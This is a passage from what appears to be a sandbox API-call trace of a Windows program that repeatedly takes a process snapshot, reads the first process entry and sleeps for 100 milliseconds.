hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.776] Sleep (dwMilliseconds=0x64) [0181.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0181.851] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.973] Sleep (dwMilliseconds=0x64) [0181.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.005] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.099] Sleep (dwMilliseconds=0x64) [0182.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.129] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.209] Sleep (dwMilliseconds=0x64) [0182.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.225] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.348] Sleep (dwMilliseconds=0x64) [0182.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.379] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.476] Sleep (dwMilliseconds=0x64) [0182.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.565] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.651] Sleep (dwMilliseconds=0x64) [0182.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.681] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.790] Sleep (dwMilliseconds=0x64) [0182.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.812] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.886] Sleep (dwMilliseconds=0x64) [0182.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0182.918] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.009] Sleep (dwMilliseconds=0x64) [0183.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.023] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.103] Sleep (dwMilliseconds=0x64) [0183.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.157] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.241] Sleep (dwMilliseconds=0x64) [0183.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.258] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.354] Sleep (dwMilliseconds=0x64) [0183.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.370] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.543] Sleep (dwMilliseconds=0x64) [0183.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.574] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.657] Sleep (dwMilliseconds=0x64) [0183.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.710] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.785] Sleep (dwMilliseconds=0x64) [0183.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.808] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.895] Sleep (dwMilliseconds=0x64) [0183.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0183.927] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.019] Sleep (dwMilliseconds=0x64) [0184.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.048] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.150] Sleep (dwMilliseconds=0x64) [0184.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.172] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.277] Sleep (dwMilliseconds=0x64) [0184.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.315] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.387] Sleep (dwMilliseconds=0x64) [0184.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.426] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.585] Sleep (dwMilliseconds=0x64) [0184.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.601] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.697] Sleep (dwMilliseconds=0x64) [0184.701] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.719] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.793] Sleep (dwMilliseconds=0x64) [0184.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.823] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.901] Sleep (dwMilliseconds=0x64) [0184.905] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0184.915] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.988] Sleep (dwMilliseconds=0x64) [0184.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.009] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.089] Sleep (dwMilliseconds=0x64) [0185.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.129] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.219] Sleep (dwMilliseconds=0x64) [0185.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.256] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.338] Sleep (dwMilliseconds=0x64) [0185.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.353] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.442] Sleep (dwMilliseconds=0x64) [0185.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.460] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.596] Sleep (dwMilliseconds=0x64) [0185.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.641] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.721] Sleep (dwMilliseconds=0x64) [0185.739] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.756] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.854] Sleep (dwMilliseconds=0x64) [0185.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0185.876] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.991] Sleep (dwMilliseconds=0x64) [0185.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.020] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.129] Sleep (dwMilliseconds=0x64) [0186.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.152] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.239] Sleep (dwMilliseconds=0x64) [0186.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.259] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.362] Sleep (dwMilliseconds=0x64) [0186.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.430] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.504] Sleep (dwMilliseconds=0x64) [0186.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.535] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.724] Sleep (dwMilliseconds=0x64) [0186.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.745] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.839] Sleep (dwMilliseconds=0x64) [0186.865] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0186.881] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.964] Sleep (dwMilliseconds=0x64) [0187.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0187.204] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.306] Sleep (dwMilliseconds=0x64) [0187.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0187.327] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.434] Sleep (dwMilliseconds=0x64) [0187.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0187.473] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.713] Sleep (dwMilliseconds=0x64) [0187.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0187.730] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.807] Sleep (dwMilliseconds=0x64) [0187.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0187.822] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.899] Sleep (dwMilliseconds=0x64) [0187.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0187.914] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.010] Sleep (dwMilliseconds=0x64) [0188.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.034] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.120] Sleep (dwMilliseconds=0x64) [0188.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.134] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.257] Sleep (dwMilliseconds=0x64) [0188.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.273] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.346] Sleep (dwMilliseconds=0x64) [0188.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.369] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.465] Sleep (dwMilliseconds=0x64) [0188.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.501] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.599] Sleep (dwMilliseconds=0x64) [0188.642] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.655] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.729] Sleep (dwMilliseconds=0x64) [0188.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.761] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.836] Sleep (dwMilliseconds=0x64) [0188.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.851] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.924] Sleep (dwMilliseconds=0x64) [0188.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0188.960] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.054] Sleep (dwMilliseconds=0x64) [0189.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0189.282] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.522] Sleep (dwMilliseconds=0x64) [0189.568] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0189.582] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.743] Sleep (dwMilliseconds=0x64) [0189.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0189.760] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.834] Sleep (dwMilliseconds=0x64) [0189.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0189.850] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.935] Sleep (dwMilliseconds=0x64) 